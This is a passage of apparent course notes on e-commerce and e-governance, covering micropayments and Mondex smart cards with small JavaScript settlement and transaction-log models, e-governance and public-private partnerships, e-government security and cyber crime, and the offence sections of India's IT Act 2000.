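  constructor(settleThreshold) {
    this.threshold = settleThreshold; // tenths of a cent
    this.wallets = new Map();         // user -> prepaid balance
    this.pending = new Map();         // seller -> accumulated, unsettled amount
    this.settlements = [];            // one larger payout per entry
  }

  // The user funds the wallet with one ordinary (macro) payment.
  fund(user, amount) {
    this.wallets.set(user, (this.wallets.get(user) || 0) + amount);
  }

  // A per-fee link costing `amount` is followed. Returns false, and changes
  // nothing, if the wallet cannot cover it, so the seller never releases
  // content that is not paid for.
  charge(user, seller, amount) {
    const balance = this.wallets.get(user) || 0;
    if (!Number.isInteger(amount) || amount <= 0 || balance < amount) return false;
    this.wallets.set(user, balance - amount);
    const accumulated = (this.pending.get(seller) || 0) + amount;
    if (accumulated >= this.threshold) {
      // Enough has built up: pay the seller once instead of once per click.
      this.settlements.push({ seller, amount: accumulated });
      this.pending.set(seller, 0);
    } else {
      this.pending.set(seller, accumulated);
    }
    return true;
  }

  balance(user) { return this.wallets.get(user) || 0; }
  owed(seller) { return this.pending.get(seller) || 0; }
}

// Constructed scenario: one reader, two sellers, a settlement threshold of
// 50 cents (500 tenths of a cent) and a $1.00 prepaid wallet.
function micropayDemo() {
  const svc = new MicropaymentService(500);
  svc.fund('reader', 1000);
  // 30 article views at 2 cents each: the 25th view brings newsSite's running
  // total to exactly 500 and triggers one settlement; 5 views remain pending.
  for (let i = 0; i < 30; i++) svc.charge('reader', 'newsSite', 20);
  // A 45-cent track exceeds the remaining 40-cent balance and is refused...
  const refused = svc.charge('reader', 'musicSite', 450);
  // ...while a 40-cent track is accepted and empties the wallet.
  const accepted = svc.charge('reader', 'musicSite', 400);
  return {
    settlements: svc.settlements,      // [{ seller: 'newsSite', amount: 500 }]
    owedNews: svc.owed('newsSite'),    // 100
    owedMusic: svc.owed('musicSite'),  // 400
    balance: svc.balance('reader'),    // 0
    refused,                           // false
    accepted,                          // true
  };
}
```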

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient [4]. The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than trust is security. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for desired content or goods.

The most common micropayment options are listed below [6]:

Call2pay: payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and Mastercard SecureCode™).

Direct debit: payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing [2]. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input, which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with microchip embedded on it

Two types

Memory-only chips

Microprocessor chips

Can hold up to 32000 bytes

Newer smart cards have math co-processors


Perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with microchips.

Construction of Smart Cards –


Why Smart Cards –

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages –

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication, ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and “lock card” functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER –

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT –

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected

o Limits for collecting personal information

o limits for using, disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information


Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos - between applications - ITSEC 6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
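The rolling transaction log (the "rolling 10 transactions" under privacy above) and the overflow problem just described, as an added example that is not Mondex's own code: a stored-value card model with offline card-to-card transfers and a 10-entry log, followed by a bank-side reconciliation that shows which transfers can no longer be matched once records have been overwritten. The card, transfer and reconcile names and the scenario are constructed.

```javascript
// Added example (not Mondex's own code): a stored-value card with a rolling
// log of the last 10 transactions. Once more than 10 transactions happen
// before the card is next read by the bank, the oldest records are gone and
// can no longer be reconciled. Names are hypothetical.
const LOG_CAPACITY = 10;

class ValueCard {
  constructor(id, balance) {
    this.id = id;
    this.balance = balance;  // cents held on the card
    this.log = [];           // rolling log, newest last
    this.dropped = 0;        // records overwritten since the last upload
  }

  // Append a record; when the log is full, the oldest record is overwritten.
  record(entry) {
    if (this.log.length === LOG_CAPACITY) {
      this.log.shift();
      this.dropped += 1;
    }
    this.log.push(entry);
  }

  // Bank-side read (ATM visit or retailer upload): hands over whatever
  // survived and clears the card's log.
  upload() {
    const result = { card: this.id, records: this.log, lost: this.dropped };
    this.log = [];
    this.dropped = 0;
    return result;
  }
}

// Offline card-to-card transfer: no bank contact, only the two cards log it.
// Returns false, and moves nothing, if `from` holds less than `cents`.
function transfer(from, to, cents, seq) {
  if (!Number.isInteger(cents) || cents <= 0 || from.balance < cents) return false;
  from.balance -= cents;
  to.balance += cents;
  from.record({ seq, type: 'debit', peer: to.id, cents });
  to.record({ seq, type: 'credit', peer: from.id, cents });
  return true;
}

// Bank reconciliation over the uploaded logs: every debit should pair with a
// credit carrying the same sequence number. Anything unpaired is either fraud
// or a record lost to overflow, and the bank cannot tell which.
function reconcile(uploads) {
  const debits = new Map();
  const credits = new Map();
  for (const u of uploads) {
    for (const r of u.records) {
      (r.type === 'debit' ? debits : credits).set(r.seq, r);
    }
  }
  const unmatched = [];
  for (const seq of debits.keys()) if (!credits.has(seq)) unmatched.push(seq);
  for (const seq of credits.keys()) if (!debits.has(seq)) unmatched.push(seq);
  const matched = [...debits.keys()].filter((seq) => credits.has(seq)).length;
  return { matched, unmatched: unmatched.sort((a, b) => a - b) };
}

// Constructed scenario: card A pays card B twelve times offline, B pays C
// once, and only then do all three cards reach a bank terminal.
function mondexDemo() {
  const a = new ValueCard('A', 5000);
  const b = new ValueCard('B', 0);
  const c = new ValueCard('C', 0);
  for (let seq = 1; seq <= 12; seq += 1) transfer(a, b, 100, seq);
  transfer(b, c, 300, 13);
  const uploads = [a.upload(), b.upload(), c.upload()];
  const result = reconcile(uploads);
  return {
    balances: { A: a.balance, B: b.balance, C: c.balance }, // 3800, 900, 300
    lost: uploads.map((u) => u.lost),                       // [2, 3, 0]
    matched: result.matched,                                // 10
    unmatched: result.unmatched,                            // [3]
  };
}
```

Balances still add up after the uploads, but debit 3 from card A has no surviving credit on card B, so the bank cannot confirm it was honest.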

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word “electronic” in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B), government-to-government (G2G) as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with treating this definition as congruent with a definition of e-governance is that it makes no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup with the support of local processes and parameters for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is because of the characteristics of CORBA - it is a location transparent, language independent, implementation independent and Operating System independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, public key security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities, but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and to create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and business via the Internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

– Long Term Contracts

– User Charges and/or Payments flowing between the Parties

– Shared Investments, but Mainly Private


– Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations


• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential “fatal flaws” that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract/Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration, but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS;

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: capability to identify who is using the services (person or software program). The process of verifying that you are who you say you are.

Authorization: capability to grant rights of access to resources. The process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: capability to prevent unauthorized access to information.

Integrity: capability to prevent information from unauthorized modification, ensuring that information can be relied upon and is accurate and complete.

Traceability: capability to chronologically interrelate any transaction to a person or system that performed the action, in a way that is verifiable.

Non-repudiation: capability to prevent the intervening person or system in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

Protecting premises, equipment and systems software, including input-output units.

Protecting software applications used to process personal data.

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness

Continually improve its control environment.

Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government webs are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. SQL injection attacks can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. 'Offence' is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorised access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening e-mail, assuming someone's identity, sexual harassment, defamation, spam and phishing are examples where computers are the tool used to commit the crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers are the target of the crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorised access to the data stored in them. Hacking incidents rose by 37 per cent in the year these notes were prepared.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt of unsolicited e-mails by customers of financial institutions, requesting them to enter their username, password or other personal information to "access" their account on some pretext. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber stalking is the use of the Internet or other electronic means to stalk someone. The term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalising a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services, a trust that VoIP caller-ID spoofing makes misplaced. It is typically used to steal credit card numbers or other information used in identity theft schemes.

A rapidly growing online user base (India)

• 121 million Internet users
• 65 million active Internet users, up 28 per cent from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users subscribed to data packages


CYBER LAW

Section 66 of the IT Act 2000 (as originally enacted): Hacking with computer system

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43: Penalty and compensation for damage to computer, computer system, etc.

Whoever, without permission of the owner or any other person who is in charge of a computer, computer system or computer network,

• secures access to such computer, computer system or computer network;
• downloads, copies or extracts any data, computer database or information;
• introduces or causes to be introduced any computer contaminant or computer virus;
• disrupts or causes disruption;
• denies or causes the denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
• destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;
• steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage,

shall be liable to pay damages by way of compensation to the person so affected. (The 2000 Act capped the compensation at one crore rupees; the 2008 amendment removed the cap and added the last two items.)

Section 66: Computer related offences (as amended in 2008)

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

Section 66A: Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device,

(a) any information that is grossly offensive or has menacing character; or


(b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device; or

(c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

Section 66C: Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

Section 66D: Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

Section 66E: Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

Section 67A: Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

Section 67C: Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on 17 October 2000. The Act has been opposed by the Save Your Voice campaign and other civil society organisations in India. The user-review and consumer social networking site MouthShut.com filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce prepared by the United Nations Commission on International Trade Law; this is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, and it came into force on 17 October 2000. The Act was substantially amended by the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on 23 and 24 December 2008, received Presidential assent on 5 February 2009 and came into force on 27 October 2009. The amended Act places additional focus on information security and adds several new sections on offences, including cyber terrorism and data protection. A set of Rules on sensitive personal information and reasonable security practices (under section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters, with four schedules forming part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cyber crimes

Offences –

Section 65: Tampering with computer source documents
  Offence: Intentional concealment, destruction or alteration of computer source code when the source code is required to be kept or maintained by law for the time being in force.
  Punishment: Imprisonment up to three years, or fine up to two lakh rupees, or both.

Section 66: Computer related offences (originally titled "Hacking")
  Offence: Dishonestly or fraudulently doing any act referred to in section 43.
  Punishment: Imprisonment up to three years, or fine up to five lakh rupees, or both.

Section 66A: Sending offensive messages through electronic means
  Offence: Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
  Punishment: Imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticised the amendments for their lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. Other observers have welcomed the amendments because they address cyber security.

